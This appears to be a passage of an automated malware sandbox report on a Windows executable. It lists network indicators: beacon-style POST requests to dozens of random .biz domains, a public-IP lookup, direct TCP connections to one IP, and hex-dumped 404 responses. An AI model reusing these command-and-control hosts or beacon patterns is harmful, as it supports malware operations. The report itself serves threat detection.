                        Source: global trafficHTTP traffic detected: POST /rylns HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /sylvrey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /tnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /rubmfur HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /nuqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /htjvvioxxlhqon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /ntodprrygrgkdvw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /jrquah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /clnuatvxfq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                        Source: global trafficHTTP traffic detected: POST /ylrygkaugqlhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: POST /jpqeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.53
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                        Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                        Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                        Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                        Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                        Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                        Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                        Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                        Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                        Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                        Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                        Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                        Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                        Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                        Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                        Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                        Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                        Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                        Source: global trafficDNS traffic detected: DNS query: deoci.biz
                        Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                        Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                        Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                        Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                        Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                        Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                        Source: global trafficDNS traffic detected: DNS query: myups.biz
                        Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                        Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                        Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                        Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                        Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                        Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                        Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                        Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                        Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                        Source: global trafficDNS traffic detected: DNS query: vyome.biz
                        Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                        Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                        Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                        Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                        Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                        Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                        Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                        Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                        Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                        Source: global trafficDNS traffic detected: DNS query: brsua.biz
                        Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                        Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                        Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                        Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                        Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                        Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                        Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                        Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                        Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                        Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                        Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                        Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                        Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                        Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                        Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                        Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
                        Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
                        Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
                        Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
                        Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
                        Source: global trafficDNS traffic detected: DNS query: whjovd.biz
                        Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
                        Source: global trafficDNS traffic detected: DNS query: reczwga.biz
                        Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                        Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                        Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                        Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                        Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                        Source: global trafficDNS traffic detected: DNS query: pectx.biz
                        Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                        Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                        Source: global trafficDNS traffic detected: DNS query: muapr.biz
                        Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                        Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
                        Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
                        Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
                        Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
                        Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
                        Source: global trafficDNS traffic detected: DNS query: uphca.biz
                        Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
                        Source: unknownHTTP traffic detected: POST /bimwjsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:39 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:39 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
